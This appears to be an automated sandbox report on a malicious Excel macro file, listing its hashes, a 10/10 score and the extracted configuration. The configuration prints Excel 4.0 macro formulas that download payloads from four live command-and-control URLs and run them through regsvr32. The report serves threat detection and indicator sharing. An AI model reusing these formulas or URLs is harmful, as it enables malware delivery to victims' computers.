General

  • Target

    582476.xlsm

  • Size

    228KB

  • MD5

    5949de004e34883d4c9f638d16a2bea4

  • SHA1

    59901ba23c32eee1dfc15cc2ea93b4caa8477118

  • SHA256

    6fa01dcf027dcdc6d59d16e4ebc4a5b29a9ab3672039a8292c9b3f8086f0cf9d

  • SHA512

    cef730b353733c1e0bd776a12fe8e11085dec92da5923f42ad74ce91422639754492d77f31784c93f463ebbe57e40e2cc8bbb113e85b53839d46995bd05bc077

  • SSDEEP

    6144:6Xi2WMrfxxjhBMMrxBRXZ5Dz3M1qa8L4cyb:6Xi2LDHf9PH5XUqRLTyb

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://datie-tw.com/img/SvH/

http://central-nutrition.com/wp-content/Nh1L6YR4qlDFWS58cVB/

http://championsfactorysampaios.com.br/xt5HKu/tDs8WsKOxQFq/

https://dacsandongthapmuoi.vn/system/cron/HwOtNCFo/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://datie-tw.com/img/SvH/","..\oxnv1.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://central-nutrition.com/wp-content/Nh1L6YR4qlDFWS58cVB/","..\oxnv2.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://championsfactorysampaios.com.br/xt5HKu/tDs8WsKOxQFq/","..\oxnv3.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dacsandongthapmuoi.vn/system/cron/HwOtNCFo/","..\oxnv4.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx")
    =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 582476.xlsm
    .xlsm office2007